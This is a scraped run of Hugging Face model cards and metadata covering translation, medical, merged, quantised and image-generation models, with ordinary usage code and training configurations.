The base model results from continually pre-training [Salamandra-7b](https://huggingface.co/BSC-LT/salamandra-7b) on parallel data and has not been published, but is reserved for internal use. SalamandraTA-7b-instruct is proficient in 35 European languages (plus 3 varieties) and supports translation-related tasks, namely: sentence-level-translation, paragraph-level-translation, document-level-translation, automatic post-editing, grammar checking, machine translation evaluation, alternative translations, named-entity-recognition and context-aware translation. > [!WARNING] > **DISCLAIMER:** This version of Salamandra is tailored exclusively for translation tasks. It lacks chat capabilities and has not been trained with any chat instructions. --- The entire Salamandra family is released under a permissive [Apache 2.0 license]((https://www.apache.org/licenses/LICENSE-2.0)). ## How to Use The following example code works under ``Python 3.10.4``, ``vllm==0.7.3``, ``torch==2.5.1`` and ``torchvision==0.20.1``, though it should run on any current version of the libraries. This is an example of translation using the model: ``` from huggingface_hub import snapshot_download from vllm import LLM, SamplingParams model_dir = snapshot_download(repo_id="BSC-LT/salamandraTA-7B-instruct-GGUF", revision="main") model_name = "salamandrata_7b_inst_q4.gguf" llm = LLM(model=model_dir + '/' + model_name, tokenizer=model_dir) source = "Spanish" target = "English" sentence = "Ayer se fue, tomó sus cosas y se puso a navegar. Una camisa, un pantalón vaquero y una canción, dónde irá, dónde irá. Se despidió, y decidió batirse en duelo con el mar. Y recorrer el mundo en su velero. Y navegar, nai-na-na, navegar." prompt = f"Translate the following text from {source} into {target}.\\n{source}: {sentence} \\n{target}:" messages = [{'role': 'user', 'content': prompt}] outputs = llm.chat(messages, sampling_params=SamplingParams( temperature=0.1, stop_token_ids=[5], max_tokens=200) )[0].outputs print(outputs[0].text) ``` ## Additional information ### Author The Language Technologies Unit from Barcelona Supercomputing Center. ### Contact For further information, please send an email to <[email protected]>. ### Copyright Copyright(c) 2025 by Language Technologies Unit, Barcelona Supercomputing Center. ### Funding This work has been promoted and financed by the Government of Catalonia through the [Aina Project](https://projecteaina.cat/). This work is funded by the _Ministerio para la Transformación Digital y de la Función Pública_ - Funded by EU – NextGenerationEU within the framework of [ILENIA Project](https://proyectoilenia.es/) with reference 2022/TL22/00215337. ### Acknowledgements The success of this project has been made possible thanks to the invaluable contributions of our partners in the [ILENIA Project](https://proyectoilenia.es/): [HiTZ](http://hitz.ehu.eus/es), and [CiTIUS](https://citius.gal/es/). Their efforts have been instrumental in advancing our work, and we sincerely appreciate their help and support. ### Disclaimer ### Disclaimer Be aware that the model may contain biases or other unintended distortions. When third parties deploy systems or provide services based on this model, or use the model themselves, they bear the responsibility for mitigating any associated risks and ensuring compliance with applicable regulations, including those governing the use of Artificial Intelligence. The Barcelona Supercomputing Center, as the owner and creator of the model, shall not be held liable for any outcomes resulting from third-party use. ### License [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0)
hongzhouyu/FineMedLM
hongzhouyu
2025-05-30T07:36:14Z
11
0
transformers
[ "transformers", "tensorboard", "safetensors", "llama", "text-generation", "medical", "conversational", "en", "zh", "dataset:hongzhouyu/FineMed-SFT", "arxiv:2501.09213", "base_model:meta-llama/Llama-3.1-8B", "base_model:finetune:meta-llama/Llama-3.1-8B", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-01-23T07:29:08Z
--- license: mit datasets: - hongzhouyu/FineMed-SFT language: - en - zh base_model: - meta-llama/Llama-3.1-8B library_name: transformers tags: - medical --- <div align="center"> <h1> FineMedLM </h1> </div> <div align="center"> <a href="https://github.com/hongzhouyu/FineMed" target="_blank">GitHub</a> | <a href="https://arxiv.org/abs/2501.09213" target="_blank">Paper</a> </div> # <span>Introduction</span> **FineMedLM** is a medical chat LLM trained via SFT on meticulously crafted synthetic data. By further applying DPO, the model acquires enhanced deep reasoning capabilities, culminating in the development of [FineMedLM-o1](https://huggingface.co/hongzhouyu/FineMedLM-o1). For more information, visit our GitHub repository. # <span>Usage</span> You can use FineMedLM in the same way as `Llama-3.1-8B-Instruct`: (⚠️**Note**: Please use the system prompt we provide to achieve better inference results) ```python from transformers import AutoModelForCausalLM, AutoTokenizer main_model_name = "hongzhouyu/FineMedLM" model = AutoModelForCausalLM.from_pretrained(main_model_name, device_map="auto") tokenizer = AutoTokenizer.from_pretrained(main_model_name) prompt = ( """The following are multiple choice questions (with answers) about health. Think step by step and then finish your answer with "the answer is (X)" where X is the correct letter choice. Question: Polio can be eradicated by which of the following? Options: A. Herbal remedies B. Use of antibiotics C. Regular intake of vitamins D. Administration of tetanus vaccine E. Attention to sewage control and hygiene F. Natural immunity acquired through exposure G. Use of antiviral drugs Answer: Let's think step by step. """ ) messages = [ {"role": "system", "content": "You are a helpful professional doctor. The user will give you a medical question, and you should answer it in a professional way."}, {"role": "user", "content": prompt} ] text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True) print(text) model_inputs = tokenizer(text, return_tensors="pt").to(model.device) print("-----start generate-----") generated_ids = model.generate( model_inputs.input_ids, max_new_tokens=2048, eos_token_id=tokenizer.eos_token_id ) answer = tokenizer.decode(generated_ids[0], skip_special_tokens=False) print(answer) ``` # <span>Citation</span> ``` @misc{yu2025finemedlmo1enhancingmedicalreasoning, title={FineMedLM-o1: Enhancing the Medical Reasoning Ability of LLM from Supervised Fine-Tuning to Test-Time Training}, author={Hongzhou Yu and Tianhao Cheng and Ying Cheng and Rui Feng}, year={2025}, eprint={2501.09213}, archivePrefix={arXiv}, primaryClass={cs.CL}, url={https://arxiv.org/abs/2501.09213}, } ```
chargoddard/mixtralmerge-8x7B-rebalanced-test
chargoddard
2025-05-30T07:31:12Z
13
0
transformers
[ "transformers", "pytorch", "safetensors", "mixtral", "text-generation", "merge", "mergekit", "conversational", "dataset:Open-Orca/SlimOrca", "license:cc-by-nc-4.0", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2024-01-04T07:49:22Z
--- license: cc-by-nc-4.0 tags: - merge - mergekit datasets: - Open-Orca/SlimOrca --- This is a dumb experiment - don't expect it to be good! I merged a few Mixtral models together then tuned *only the routing parameters*. There was a pretty steep drop in loss with only a bit of training - went from ~0.99 to ~.7 over about ten million tokens. I'm hoping this after-the-fact balancing will have reduced some of the nasty behavior typical of current tunes. But maybe it just made it even dumber! We'll see. Uses ChatML format. Will update with more details if it turns out promising.
TOMFORD79/Tom8
TOMFORD79
2025-05-30T07:27:35Z
0
0
null
[ "safetensors", "any-to-any", "omega", "omegalabs", "bittensor", "agi", "license:mit", "region:us" ]
any-to-any
2025-05-30T06:16:10Z
--- license: mit tags: - any-to-any - omega - omegalabs - bittensor - agi --- This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet. Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
keioio/chatbot_english_deepseek_v3
keioio
2025-05-30T07:23:45Z
0
0
transformers
[ "transformers", "pytorch", "safetensors", "llama", "text-generation", "text-generation-inference", "unsloth", "trl", "sft", "conversational", "en", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T07:18:48Z
--- base_model: unsloth/deepseek-r1-distill-llama-8b-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl - sft license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** keioio - **License:** apache-2.0 - **Finetuned from model :** unsloth/deepseek-r1-distill-llama-8b-unsloth-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
tojifushiguro123123/GISUA-lora-finetuned
tojifushiguro123123
2025-05-30T07:22:31Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T07:22:21Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
reesu/Finetunedgemma-3
reesu
2025-05-30T07:18:04Z
34
0
transformers
[ "transformers", "safetensors", "gemma", "image-text-to-text", "text-generation-inference", "unsloth", "gemma3", "trl", "conversational", "en", "base_model:unsloth/gemma-3-4b-it-unsloth-bnb-4bit", "base_model:finetune:unsloth/gemma-3-4b-it-unsloth-bnb-4bit", "license:apache-2.0", "endpoints_compatible", "region:us" ]
image-text-to-text
2025-05-30T06:02:23Z
--- base_model: unsloth/gemma-3-4b-it-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - gemma3 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** reesu - **License:** apache-2.0 - **Finetuned from model :** unsloth/gemma-3-4b-it-unsloth-bnb-4bit This gemma3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
danhtran2mind/ghibli-fine-tuned-sd-2.1
danhtran2mind
2025-05-30T07:17:01Z
33
0
diffusers
[ "diffusers", "tensorboard", "safetensors", "ghibli", "text2image", "text-to-image", "en", "dataset:uwunish/ghibli-dataset", "base_model:stabilityai/stable-diffusion-2-1-base", "base_model:finetune:stabilityai/stable-diffusion-2-1-base", "license:mit", "autotrain_compatible", "endpoints_compatible", "diffusers:StableDiffusionPipeline", "region:us" ]
text-to-image
2025-04-19T03:51:57Z
--- license: mit datasets: - uwunish/ghibli-dataset language: - en base_model: - stabilityai/stable-diffusion-2-1-base pipeline_tag: text-to-image library_name: diffusers tags: - ghibli - text2image --- <div align="center"> <h1> Ghibli Fine-Tuned Stable Diffusion 2.1 </h1> </div> ## Dataset Avalible at: https://huggingface.co/datasets/uwunish/ghibli-dataset. ## Hyperparameters The fine-tuning process was optimized with the following hyperparameters: | Hyperparameter | Value | | --- | --- | | `learning_rate` | 1e-05 | | `num_train_epochs` | 40 | | `train_batch_size` | 2 | | `gradient_accumulation_steps` | 2 | | `mixed_precision` | "fp16" | | `resolution` | 512 | | `max_grad_norm` | 1 | | `lr_scheduler` | "constant" | | `lr_warmup_steps` | 0 | | `checkpoints_total_limit` | 1 | | `use_ema` | True | | `use_8bit_adam` | True | | `center_crop` | True | | `random_flip` | True | | `gradient_checkpointing` | True | These parameters were carefully selected to balance training efficiency and model performance, leveraging techniques like mixed precision and gradient checkpointing. ## Metrics The fine-tuning process achieved a final loss of **0.0345**, indicating excellent convergence and high fidelity to the Ghibli art style. ## Usage ### Step 1: Import Required Libraries Begin by importing the necessary libraries to power the image generation pipeline. ```python import torch from PIL import Image import numpy as np from transformers import CLIPTextModel, CLIPTokenizer from diffusers import AutoencoderKL, UNet2DConditionModel, PNDMScheduler from tqdm import tqdm ``` ### Step 2: Configure the Model Set up the device, data type, and load the pre-trained Ghibli-fine-tuned Stable Diffusion model. ```python # Configure device and data type device = torch.device("cuda" if torch.cuda.is_available() else "cpu") dtype = torch.float16 if torch.cuda.is_available() else torch.float32 # Model path model_name = "danhtran2mind/ghibli-fine-tuned-sd-2.1" # Load model components vae = AutoencoderKL.from_pretrained(model_name, subfolder="vae", torch_dtype=dtype).to(device) tokenizer = CLIPTokenizer.from_pretrained(model_name, subfolder="tokenizer") text_encoder = CLIPTextModel.from_pretrained(model_name, subfolder="text_encoder", torch_dtype=dtype).to(device) unet = UNet2DConditionModel.from_pretrained(model_name, subfolder="unet", torch_dtype=dtype).to(device) scheduler = PNDMScheduler.from_pretrained(model_name, subfolder="scheduler") ``` ### Step 3: Define the Image Generation Function Use the following function to generate Ghibli-style images based on your text prompts. ```python def generate_image(prompt, height=512, width=512, num_inference_steps=50, guidance_scale=3.5, seed=42): """Generate a Ghibli-style image from a text prompt.""" # Set random seed for reproducibility generator = torch.Generator(device=device).manual_seed(int(seed)) # Tokenize and encode the prompt text_input = tokenizer( [prompt], padding="max_length", max_length=tokenizer.model_max_length, truncation=True, return_tensors="pt" ) with torch.no_grad(): text_embeddings = text_encoder(text_input.input_ids.to(device))[0].to(dtype=dtype) # Encode an empty prompt for classifier-free guidance uncond_input = tokenizer( [""], padding="max_length", max_length=text_input.input_ids.shape[-1], return_tensors="pt" ) with torch.no_grad(): uncond_embeddings = text_encoder(uncond_input.input_ids.to(device))[0].to(dtype=dtype) text_embeddings = torch.cat([uncond_embeddings, text_embeddings]) # Initialize latent representations latents = torch.randn( (1, unet.config.in_channels, height // 8, width // 8), generator=generator, dtype=dtype, device=device ) # Configure scheduler timesteps scheduler.set_timesteps(num_inference_steps) latents = latents * scheduler.init_noise_sigma # Denoising loop for t in tqdm(scheduler.timesteps, desc="Generating image"): latent_model_input = torch.cat([latents] * 2) latent_model_input = scheduler.scale_model_input(latent_model_input, t) with torch.no_grad(): if device.type == "cuda": with torch.autocast(device_type="cuda", dtype=torch.float16): noise_pred = unet(latent_model_input, t, encoder_hidden_states=text_embeddings).sample else: noise_pred = unet(latent_model_input, t, encoder_hidden_states=text_embeddings).sample # Apply classifier-free guidance noise_pred_uncond, noise_pred_text = noise_pred.chunk(2) noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond) latents = scheduler.step(noise_pred, t, latents).prev_sample # Decode latents to image with torch.no_grad(): latents = latents / vae.config.scaling_factor image = vae.decode(latents).sample # Convert to PIL Image image = (image / 2 + 0.5).clamp(0, 1) image = image.detach().cpu().permute(0, 2, 3, 1).numpy() image = (image * 255).round().astype("uint8") return Image.fromarray(image[0]) ``` ### Step 4: Generate Your Image Craft a vivid prompt and generate your Ghibli-style masterpiece. ```python # Example prompt prompt = "a serene landscape in Ghibli style" # Generate the image image = generate_image( prompt=prompt, height=512, width=512, num_inference_steps=50, guidance_scale=3.5, seed=42 ) # Display or save the image image.show() # Or image.save("ghibli_landscape.png") ``` ## Environment The project was developed and tested in the following environment: - **Python Version**: 3.11.11 - **Dependencies**: | Library | Version | | --- | --- | | huggingface-hub | 0.30.2 | | accelerate | 1.3.0 | | bitsandbytes | 0.45.5 | | torch | 2.5.1 | | Pillow | 11.1.0 | | numpy | 1.26.4 | | transformers | 4.51.1 | | torchvision | 0.20.1 | | diffusers | 0.33.1 | | gradio | Latest | Ensure your environment matches these specifications to avoid compatibility issues.
pot99rta/BMO-CaptianMaid-12B-GGUF
pot99rta
2025-05-30T07:16:15Z
5
0
transformers
[ "transformers", "gguf", "mergekit", "merge", "llama-cpp", "gguf-my-repo", "base_model:pot99rta/BMO-CaptianMaid-12B", "base_model:quantized:pot99rta/BMO-CaptianMaid-12B", "endpoints_compatible", "region:us", "conversational" ]
null
2025-05-29T23:38:19Z
--- base_model: pot99rta/BMO-CaptianMaid-12B library_name: transformers tags: - mergekit - merge - llama-cpp - gguf-my-repo --- # BMO-CaptianMaid-12B-GGUF ![image/png](https://cdn-uploads.huggingface.co/production/uploads/636ea389fd9751c3d081e88e/HtM8KBr6PZHVg5iiAJSkN.png) ```Models Merged:``` ```1. Nitral-AI/Captain_BMO-12B``` ```2. pot99rta/CaptainMaid-12B-VioletMell-V0.420``` ```Preset:``` ```Use ChatML or Mistral - Phi works too for some unknown reason.``` Phi and Mistral works with interesting results.. I quite like it with my settings. This model was converted to GGUF format from [`pot99rta/BMO-CaptianMaid-12B`](https://huggingface.co/pot99rta/BMO-CaptianMaid-12B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/pot99rta/BMO-CaptianMaid-12B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo pot99rta/BMO-CaptianMaid-12B-Q8_0-GGUF --hf-file bmo-captianmaid-12b-q8_0.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo pot99rta/BMO-CaptianMaid-12B-Q8_0-GGUF --hf-file bmo-captianmaid-12b-q8_0.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo pot99rta/BMO-CaptianMaid-12B-Q8_0-GGUF --hf-file bmo-captianmaid-12b-q8_0.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo pot99rta/BMO-CaptianMaid-12B-Q8_0-GGUF --hf-file bmo-captianmaid-12b-q8_0.gguf -c 2048 ```
pot99rta/BMO-CaptianMaid-12B
pot99rta
2025-05-30T07:15:55Z
10
0
transformers
[ "transformers", "safetensors", "mistral", "text-generation", "mergekit", "merge", "conversational", "arxiv:2306.01708", "base_model:Nitral-AI/Captain_BMO-12B", "base_model:merge:Nitral-AI/Captain_BMO-12B", "base_model:pot99rta/CaptainMaid-12B-VioletMell-V0.420", "base_model:merge:pot99rta/CaptainMaid-12B-VioletMell-V0.420", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-29T20:31:19Z
--- base_model: - Nitral-AI/Captain_BMO-12B - pot99rta/CaptainMaid-12B-VioletMell-V0.420 library_name: transformers tags: - mergekit - merge --- # BMO-CaptianMaid-12B ![image/png](https://cdn-uploads.huggingface.co/production/uploads/636ea389fd9751c3d081e88e/bRUq0aF5mcJXmTVgeqeI8.png) ```Models Merged:``` ```1. Nitral-AI/Captain_BMO-12B``` ```2. pot99rta/CaptainMaid-12B-VioletMell-V0.420``` ```Preset:``` ```Use ChatML or Mistral - Phi works too for some unknown reason.``` Phi and Mistral works with interesting results.. I quite like it with my settings. # merge This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit). ## Merge Details ### Merge Method This model was merged using the [TIES](https://arxiv.org/abs/2306.01708) merge method using [pot99rta/CaptainMaid-12B-VioletMell-V0.420](https://huggingface.co/pot99rta/CaptainMaid-12B-VioletMell-V0.420) as a base. ### Models Merged The following models were included in the merge: * [Nitral-AI/Captain_BMO-12B](https://huggingface.co/Nitral-AI/Captain_BMO-12B) ### Configuration The following YAML configuration was used to produce this model: ```yaml models: - model: pot99rta/CaptainMaid-12B-VioletMell-V0.420 #no parameters necessary for base model - model: pot99rta/CaptainMaid-12B-VioletMell-V0.420 parameters: density: 0.5 weight: 0.5 - model: Nitral-AI/Captain_BMO-12B parameters: density: 0.5 weight: 0.5 merge_method: ties base_model: pot99rta/CaptainMaid-12B-VioletMell-V0.420 parameters: normalize: false int8_mask: true dtype: float16 ```
DevQuasar/huihui-ai.AceReason-Nemotron-14B-abliterated-GGUF
DevQuasar
2025-05-30T07:14:33Z
8
0
null
[ "gguf", "text-generation", "base_model:huihui-ai/AceReason-Nemotron-14B-abliterated", "base_model:quantized:huihui-ai/AceReason-Nemotron-14B-abliterated", "endpoints_compatible", "region:us", "conversational" ]
text-generation
2025-05-30T04:43:14Z
--- base_model: - huihui-ai/AceReason-Nemotron-14B-abliterated pipeline_tag: text-generation --- [<img src="https://raw.githubusercontent.com/csabakecskemeti/devquasar/main/dq_logo_black-transparent.png" width="200"/>](https://devquasar.com) Quantized version of: [huihui-ai/AceReason-Nemotron-14B-abliterated](https://huggingface.co/huihui-ai/AceReason-Nemotron-14B-abliterated) 'Make knowledge free for everyone' <p align="center"> Made with <br> <a href="https://www.civo.com/" target="_blank"> <img src="https://www.civo.com/assets/public/brand-assets/civo-logo-colour-60cc1622dedf346f7afde1fff760523f731b0aac106a5465af98ff4073114b74.svg" width="100"/> </a> </p> <a href='https://ko-fi.com/L4L416YX7C' target='_blank'><img height='36' style='border:0px;height:36px;' src='https://storage.ko-fi.com/cdn/kofi6.png?v=6' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a>
pot99rta/PatriMaidV2-12B
pot99rta
2025-05-30T07:12:00Z
8
0
transformers
[ "transformers", "safetensors", "mistral", "text-generation", "mergekit", "merge", "arxiv:2306.01708", "base_model:PocketDoc/Dans-PersonalityEngine-V1.3.0-12b", "base_model:merge:PocketDoc/Dans-PersonalityEngine-V1.3.0-12b", "base_model:pot99rta/PatriMaid-12B-Forgottenslop-NeonMell", "base_model:merge:pot99rta/PatriMaid-12B-Forgottenslop-NeonMell", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-29T18:24:09Z
--- base_model: - PocketDoc/Dans-PersonalityEngine-V1.3.0-12b - pot99rta/PatriMaid-12B-Forgottenslop-NeonMell library_name: transformers tags: - mergekit - merge --- # PatriMaidV2-12B ![image/png](https://cdn-uploads.huggingface.co/production/uploads/636ea389fd9751c3d081e88e/2dliTbOaFq4cihrCaKIEK.png) Neon Glow ```Models Merged:``` ```1. PocketDoc/Dans-PersonalityEngine-V1.3.0-12b``` ```2. pot99rta/PatriMaid-12B-Forgottenslop-NeonMell``` ```Preset:``` ```Use ChatML or Mistral - You can use Phi too!``` Due to Dan using Phi as a present template, best mix is Phi and Mistral. For some weird reason... # merge This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit). ## Merge Details ### Merge Method This model was merged using the [TIES](https://arxiv.org/abs/2306.01708) merge method using [pot99rta/PatriMaid-12B-Forgottenslop-NeonMell](https://huggingface.co/pot99rta/PatriMaid-12B-Forgottenslop-NeonMell) as a base. ### Models Merged The following models were included in the merge: * [PocketDoc/Dans-PersonalityEngine-V1.3.0-12b](https://huggingface.co/PocketDoc/Dans-PersonalityEngine-V1.3.0-12b) ### Configuration The following YAML configuration was used to produce this model: ```yaml models: - model: pot99rta/PatriMaid-12B-Forgottenslop-NeonMell #no parameters necessary for base model - model: pot99rta/PatriMaid-12B-Forgottenslop-NeonMell parameters: density: 0.5 weight: 0.5 - model: PocketDoc/Dans-PersonalityEngine-V1.3.0-12b parameters: density: 0.5 weight: 0.5 merge_method: ties base_model: pot99rta/PatriMaid-12B-Forgottenslop-NeonMell parameters: normalize: false int8_mask: true dtype: float16 ```
TOMFORD79/Tom7
TOMFORD79
2025-05-30T07:11:42Z
0
0
null
[ "safetensors", "any-to-any", "omega", "omegalabs", "bittensor", "agi", "license:mit", "region:us" ]
any-to-any
2025-05-30T06:16:05Z
--- license: mit tags: - any-to-any - omega - omegalabs - bittensor - agi --- This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet. Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
dimasik2987/47a9bfc3-f027-4ec0-88ad-186371beb371
dimasik2987
2025-05-30T07:08:51Z
0
0
peft
[ "peft", "safetensors", "mistral", "axolotl", "generated_from_trainer", "base_model:lcw99/zephykor-ko-7b-chang", "base_model:adapter:lcw99/zephykor-ko-7b-chang", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T06:27:20Z
--- library_name: peft base_model: lcw99/zephykor-ko-7b-chang tags: - axolotl - generated_from_trainer model-index: - name: 47a9bfc3-f027-4ec0-88ad-186371beb371 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: lcw99/zephykor-ko-7b-chang bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 637230a02f06fb7e_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_instruction: instruct field_output: output format: '{instruction}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 2 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: dimasik2987/47a9bfc3-f027-4ec0-88ad-186371beb371 hub_repo: null hub_strategy: end hub_token: null learning_rate: 5.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 128 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 64 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 12 mixed_precision: bf16 mlflow_experiment_name: /tmp/637230a02f06fb7e_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 914d7dca-b18c-4388-87c1-d8f0c83ec6ee wandb_project: s56-7 wandb_run: your_name wandb_runid: 914d7dca-b18c-4388-87c1-d8f0c83ec6ee warmup_steps: 50 weight_decay: 0.02 xformers_attention: true ``` </details><br> # 47a9bfc3-f027-4ec0-88ad-186371beb371 This model is a fine-tuned version of [lcw99/zephykor-ko-7b-chang](https://huggingface.co/lcw99/zephykor-ko-7b-chang) on the None dataset. It achieves the following results on the evaluation set: - Loss: 1.5184 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 5e-06 - train_batch_size: 12 - eval_batch_size: 12 - seed: 42 - gradient_accumulation_steps: 2 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 6.1086 | 0.0002 | 1 | 3.6037 | | 2.464 | 0.0482 | 250 | 1.5579 | | 3.4586 | 0.0965 | 500 | 1.5184 | ### Framework versions - PEFT 